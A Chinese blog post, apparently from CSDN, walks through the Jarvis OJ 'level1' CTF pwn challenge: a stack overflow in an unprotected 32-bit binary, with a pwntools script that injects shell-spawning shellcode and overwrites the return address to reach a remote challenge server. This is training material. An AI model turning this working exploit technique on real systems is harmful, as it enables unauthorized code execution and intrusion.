CTF-PWN-level1(Jarvis oj)[栈上shellcode的执行]

最新推荐文章于 2024-05-16 14:50:25 发布
最新推荐文章于 2024-05-16 14:50:25 发布
阅读量827 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/87272095
版权

checksec发现没有开保护机制,所以我们可以考虑使用shellcode方法pwn掉。

查看vulnerable_function函数内部

发现程序直接给我们了buf的首地址。点进去看之后发现,buf只能存0x88个字符,但是我们可以读入0x100个字符。由于读入的时候字符串会暂时存在栈上,我们可以考虑覆盖return的地址到buf的首地址中,然后在buf首地址开始写入shellcode,其余地方则可以填入垃圾信息。

至于计算填入垃圾信息的长度,可以先输入多余0x88个垃圾信息,然后转到汇编,查看执行到ret时的栈顶位置,栈顶存的地址即为ret到的地址,修改即可

计算可知,shellcode和垃圾信息一共要填入140的长度,然后加入buf的首地址即可

from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p=process('./level1')
p=remote('pwn2.jarvisoj.com',9877)
shellcode=asm(shellcraft.sh())
text=p.recvline()[14:-2]
buf_adr=int(text,16)
payload=shellcode+'A'*(140-len(shellcode))+p32(buf_adr)
p.send(payload)
p.interactive()

 

SuperGate
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN-shellcode
MuMuLee_的博客
09-26 1774
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 题目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
攻防世界level0 + (Jarvis Oj)(Pwn) level1
qq_44832048的博客
07-24 1939
攻防世界level0 将文件在ida中打开, 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,, 无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。查找字符串 这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址...
[BUUCTF]PWN——jarvisoj_level1
mcmuyanga的博客
11-09 1525
jarvisoj_level1 附件 步骤: 例行检查,32位程序,没有开任何保护 本地运行一下程序,看看大概的情况,可以看到输出了一个地址 32位ida载入,习惯性的检索程序里的字符串,没有发现可以直接利用的gates, main函数开始看程序 function函数 参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们 由于没有开启nx,所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
最新发布
2401_84969722的博客
05-16 228
CTFPWN题型通常会直接给定一个已经编译好的二进制程序,然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码发送playload,通过远程代码执行来达到攻击的效果,最终拿到目标机器的shell(控制台权限)来夺取flag。:常为C、C++及python写的一段程序,程序中往往包含着这样那样的漏洞。:利用反汇编等途径查看源代码并对程序进行理解的过程**调试:**程序调试是指通过分析和排查程序中的错误和问题,以找出程序运行过程中的错误和异常,并进行修复和优化的过程。
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 402
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
[WUSTCTF2020]level1
chneft的博客
11-30 435
下载文件得到两个文件,一个无后缀的level1和一个output的txt文件,推测level1应该是可执行文件打开output看看。
shellcode学习
weixin_52878095的博客
03-12 4826
一道题目 最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写 我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行 丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出 我们看一下 pwntool
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
jarvisoj pwn level1 ——记第一次shellcode的编写
Vccxx的博客
03-19 3590
jarvisoj(https://www.jarvisoj.com/challenges )pwn部分 level1 解题过程:在队友的指导下写了人生第一个shellcode感觉很刺激,过程中还是学到了很多东西,记录一下这个程序流程很简单,用ida分析就两个主要的函数:main:int __cdecl main(int argc, const char **argv, const char **en
pwn入门之栈溢出练习
dfdhxb995397的博客
09-10 914
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn的栈溢出,做了一下jarvisoj里的一些ctf pwn题,感觉质量都很不错,难度循序渐进,把自己做题的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位)代码<ig...
Jarvis OJ Basic WP
qq_42192672的博客
09-20 1034
1. -.-字符串 摩斯密码 2. secret 打开题目地址是个网页跳转,据大佬说直接用burpsuite,我就试了一下 后来发现了个更方便的方法,直接F12,你懂的 3. A Piece Of Cake 在线工具:https://quipqiup.com/ 字母频率破解替换加密 分析上下文,发现缺少的字母是b,填充进去拿flag就好 4. 美丽的实验室logo 工具st...
windows下shellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
CTF-PWN-level4(jarvis oj)
SuperGate的博客
02-18 280
这道题只出现了read函数以及write函数。checksec也只发现了NX。 这次并没有给出libc的文件,所以我们可以考虑使用pwntools中的DynELF泄漏system地址,然后将'/bin/sh'写入.bss段中保存,在调用system函数的时候载入.bss保存的相应地址即可 exp如下 from pwn import * context(os='linux',arch='i3...
CTF-OS怎么在github上下载镜像文件
05-12
CTF-OS是一个基于Linux的操作系统,它的代码托管在GitHub上,你可以通过以下步骤下载镜像文件: 1. 首先,访问CTF-OS的GitHub仓库:https://github.com/ctf-wiki/ctf-os-2 2. 在页面中找到“Releases”选项卡,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值